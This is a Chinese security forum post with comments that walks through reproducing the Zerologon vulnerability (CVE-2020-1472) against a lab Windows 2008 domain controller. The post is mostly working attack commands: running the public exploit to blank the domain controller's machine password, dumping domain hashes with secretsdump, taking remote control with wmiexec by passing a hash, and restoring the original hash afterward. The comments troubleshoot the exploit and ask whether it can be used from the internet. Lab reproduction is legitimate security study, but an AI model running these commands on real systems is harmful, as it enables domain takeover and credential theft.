CVE-2020-1472 复现

2020-09-15 23:07:09 31 abc188174 14149

攻击机：kali2020 受害者：windows2008
https://github.com/SecuraBV/CVE-2020-1472 poc
https://github.com/dirkjanm/CVE-2020-1472 exp

1、本地搭建一个域环境

2、使用poc验证
既然提示安装东西，那就 pip install -r requirements.txt ,之后再执行 python3 zerologon_tester.py <主机名> <ip>

3、使用exp攻击，但是这个时候很多人的脚本回报错，是因为缺少 impacket，https://github.com/SecureAuthCorp/impacket ，python3 setup.py install //安装impacket，然后执行exp
python3 cve-2020-1472-exploit.py owa 192.168.137.137

4、使用impacket的secretsdump.py导出域控制上的hash
python3 secretsdump.py god.org/owa\[email protected] -no-pass

5、利用获取到的管理员hash来远程操作域控服务器
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13cf6cfe1f2fc41cd286c7c8caec978b god.org/[email protected]

6、获取管理员hash，远程连接导出sam数据库中的原来的计算机hash

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

7、恢复计算机的hash
下载脚本 https://github.com/risksense/zerologon
python3 reinstall_original_pw.py owa 192.168.137.137 ad611ebf4fd2de9448a33ba693b212f4 //注意hash的部分，只有后半部分

8、恢复计算机的hash
使用impacket的脚本来登录域控来验证hash
使用7步骤的脚本回复hash前

使用7步骤脚本恢复hash后

类别渗透测试

关于作者

abc18817440篇文章350篇回复

评论31次

要评论？请先登录或注册

31楼

wangfly
2020-10-23 22:51

学到了，嘻嘻嘻。。。。大佬

回复|@ta|踩(0)|顶(0)
30楼

wojiaochongya
2020-9-23 07:33

exp链接里的文件是restorepassword.py，你那是改了名还是压根不是用的这个？

回复|@ta|踩(0)|顶(0)
29楼

wojiaochongya
2020-9-23 07:28

from impacket.dcerpc.v5.nrpc import NetrServerPasswordSet2Response, NetrServerPasswordSet2 ImportError: cannot import name 'NetrServerPasswordSet2Response' from 'impacket.dcerpc.v5.nrpc' 一直报错

回复|@ta|踩(0)|顶(0)
28楼

darker
2020-9-21 10:36

成功是成功了，就是不知道为啥域内的应用都登录不了了，按理说是改的域控本地管理啊

回复|@ta|踩(0)|顶(0)
27楼

abc188174
2020-9-18 15:34

TO_OT：
@abc188174 @moimou @Nolan @q1af4n 几位表哥，感觉你们技术比较好，想请教你们两个问题；1.这个漏洞在外网能否利用，打目标机器？2.利用条件，目标必须是域控机器才行吗？如果只是域内成员，但不是域控，还能利用吗？
回复|@ta
1

有表哥说socks代理可以使用，所以理论来说外网可以使用（域控外网的很少的），其次就是这个漏洞是针是NetLogon 特权提升漏洞，以我的理解这个漏洞是只针对域控，只有域控才会安装NetLogon

回复|@ta|踩(0)|顶(0)
26楼

TO_OT
2020-9-18 10:20

@abc188174 @moimou @Nolan @q1af4n 几位表哥，感觉你们技术比较好，想请教你们两个问题； 1.这个漏洞在外网能否利用，打目标机器？ 2.利用条件，目标必须是域控机器才行吗？如果只是域内成员，但不是域控，还能利用吗？

回复|@ta|踩(0)|顶(0)
25楼

xiwandashi
2020-9-17 16:31

mimikatz刚发的新版已经集成好了

回复|@ta|踩(0)|顶(0)
24楼

ly55521
2020-9-17 14:38

ly55521：
exp 的时候执行出错，已安装 github 的 impacketPerforming authentication attempts...=================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================Target vulnerable, changing account password to empty stringTraceback (most recent call last): File "cve-2020-1472-exploit.py", line 106, in <module> perform_attack('\\\\' + dc_name, dc_ip, dc_name) File "cve-2020-1472-exploit.py", line 84, in perform_attack result = exploit(dc_handle, rpc_con, target_computer) File "cve-2020-1472-exploit.py", line 57, in exploit request = nrpc.NetrServerPasswordSet2()AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'
回复|@ta
1

我知道了，我的是要下载后执行 python3 -m pip install

回复|@ta|踩(0)|顶(0)
23楼

ly55521
2020-9-17 14:34

exp 的时候执行出错，已安装 github 的 impacket Performing authentication attempts... ================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================================= Target vulnerable, changing account password to empty string Traceback (most recent call last): File "cve-2020-1472-exploit.py", line 106, in <module> perform_attack('\\\\' + dc_name, dc_ip, dc_name) File "cve-2020-1472-exploit.py", line 84, in perform_attack result = exploit(dc_handle, rpc_con, target_computer) File "cve-2020-1472-exploit.py", line 57, in exploit request = nrpc.NetrServerPasswordSet2() AttributeError: module 'impacket.dcerpc.v5.nrpc' has no attribute 'NetrServerPasswordSet2'

回复|@ta|踩(0)|顶(0)
22楼

wllhm_27301
2020-9-17 14:09

wllhm_27301：
第六步到第八步是要干嘛啊
回复|@ta
1
abc188174：
恢复原来的hash值，不然随意的改变hash会对域，dns或者一些其他的功能可能造成影响
回复|@ta
2

还有这个域$用户的口令我这边怎么解不开啊我什么时候配置的啊怎么都不知道我配的都是弱口令啊加密方式的问题

回复|@ta|踩(0)|顶(0)
21楼

wllhm_27301
2020-9-17 12:35

wllhm_27301：
第六步到第八步是要干嘛啊
回复|@ta
1
abc188174：
恢复原来的hash值，不然随意的改变hash会对域，dns或者一些其他的功能可能造成影响
回复|@ta
2

恢复的是“域$”用户的吗？

回复|@ta|踩(0)|顶(0)
20楼

backlion
2020-9-17 11:26

最关键的还是impacket需要最新的

回复|@ta|踩(0)|顶(0)
19楼

abc188174
2020-9-17 08:00

wllhm_27301：
第六步到第八步是要干嘛啊
回复|@ta
1

恢复原来的hash值，不然随意的改变hash会对域，dns或者一些其他的功能可能造成影响

回复|@ta|踩(0)|顶(0)
18楼

wllhm_27301
2020-9-17 00:43

第六步到第八步是要干嘛啊

回复|@ta|踩(0)|顶(0)
17楼

abc188174
2020-9-16 16:07

darker：
第五步连接失败啥原因啊
回复|@ta
1

会不会是hash选择错了，这个我导出的hash是所有的hash，选择域控的hash才可以连接域控服务器

回复|@ta|踩(0)|顶(0)
16楼

darker
2020-9-16 15:06

第五步连接失败啥原因啊

回复|@ta|踩(0)|顶(0)
15楼

xiaoyu
2020-9-16 14:43

win server 2012以上可以成功吗？

回复|@ta|踩(0)|顶(0)
14楼

abc188174
2020-9-16 12:56

895515845：
装了impacket还一直报错是咋回事呢
回复|@ta
1

用python3安装，别直接python

回复|@ta|踩(0)|顶(0)
13楼

q1af4n
2020-9-16 12:45

895515845：
装了impacket还一直报错是咋回事呢
回复|@ta
1

还有个就是impacket要最新版

回复|@ta|踩(0)|顶(0)
12楼

q1af4n
2020-9-16 12:44

895515845：
装了impacket还一直报错是咋回事呢
回复|@ta
1

我遇到一个报错是connect refuce，那是因为被防火墙拦截了，你测试一下端口能通吗，nc -znv ip 139

回复|@ta|踩(0)|顶(0)

CVE-2020-1472 复现

关于作者

评论31次

学到了，嘻嘻嘻。。。。大佬

exp链接里的文件是restorepassword.py，你那是改了名还是压根不是用的这个？

from impacket.dcerpc.v5.nrpc import NetrServerPasswordSet2Response, NetrServerPasswordSet2 ImportError: cannot import name 'NetrServerPasswordSet2Response' from 'impacket.dcerpc.v5.nrpc' 一直报错

成功是成功了，就是不知道为啥域内的应用都登录不了了，按理说是改的域控本地管理啊

@abc188174 @moimou @Nolan @q1af4n 几位表哥，感觉你们技术比较好，想请教你们两个问题；1.这个漏洞在外网能否利用，打目标机器？2.利用条件，目标必须是域控机器才行吗？如果只是域内成员，但不是域控，还能利用吗？

有表哥说socks代理可以使用，所以理论来说外网可以使用（域控外网的很少的），其次就是这个漏洞是针是NetLogon 特权提升漏洞，以我的理解这个漏洞是只针对域控，只有域控才会安装NetLogon

@abc188174 @moimou @Nolan @q1af4n 几位表哥，感觉你们技术比较好，想请教你们两个问题； 1.这个漏洞在外网能否利用，打目标机器？ 2.利用条件，目标必须是域控机器才行吗？如果只是域内成员，但不是域控，还能利用吗？

mimikatz刚发的新版已经集成好了

我知道了，我的是要下载后 执行 python3 -m pip install

第六步到第八步是要干嘛啊

恢复原来的hash值，不然随意的改变hash会对域，dns或者一些其他的功能可能造成影响

还有这个域$用户的口令 我这边怎么解不开啊 我什么时候配置的啊 怎么都不知道 我配的都是弱口令啊 加密方式的问题

第六步到第八步是要干嘛啊

恢复原来的hash值，不然随意的改变hash会对域，dns或者一些其他的功能可能造成影响

恢复的是“域$”用户的吗 ？

最关键的还是impacket需要最新的

第六步到第八步是要干嘛啊

恢复原来的hash值，不然随意的改变hash会对域，dns或者一些其他的功能可能造成影响

第六步到第八步是要干嘛啊

第五步连接失败啥原因啊

会不会是hash选择错了，这个我导出的hash是所有的hash，选择域控的hash才可以连接域控服务器

第五步连接失败啥原因啊

win server 2012以上可以成功吗？

装了impacket还一直报错是咋回事呢

用python3安装，别直接python

装了impacket还一直报错是咋回事呢

还有个就是impacket要最新版

装了impacket还一直报错是咋回事呢

我遇到一个报错是connect refuce，那是因为被防火墙拦截了，你测试一下端口能通吗，nc -znv ip 139

热门文章

渗透测试溯源小技巧（邮箱、域名、电话、qq）

渗透测试宝塔最新版本获取完整手机号

安全资讯XZ Utils 库中发现秘密后门，影响主要的 Linux 发行版

安全资讯Apex Legends 玩家担心 ALGS 黑客攻击后存在 RCE 缺陷

社会工程小世界找联系方式之拓展思路

最新回复

精华推荐

渗透测试深入理解JPEG图像格式Jphide隐写

渗透测试CVE-2017-7269的几个技巧及BUG修正

渗透测试SSRF漏洞(原理&绕过姿势)

渗透测试Web中间件常见漏洞总结

渗透测试JAVASCRIPT安全性问题总结

我知道了，我的是要下载后执行 python3 -m pip install

还有这个域$用户的口令我这边怎么解不开啊我什么时候配置的啊怎么都不知道我配的都是弱口令啊加密方式的问题

恢复的是“域$”用户的吗？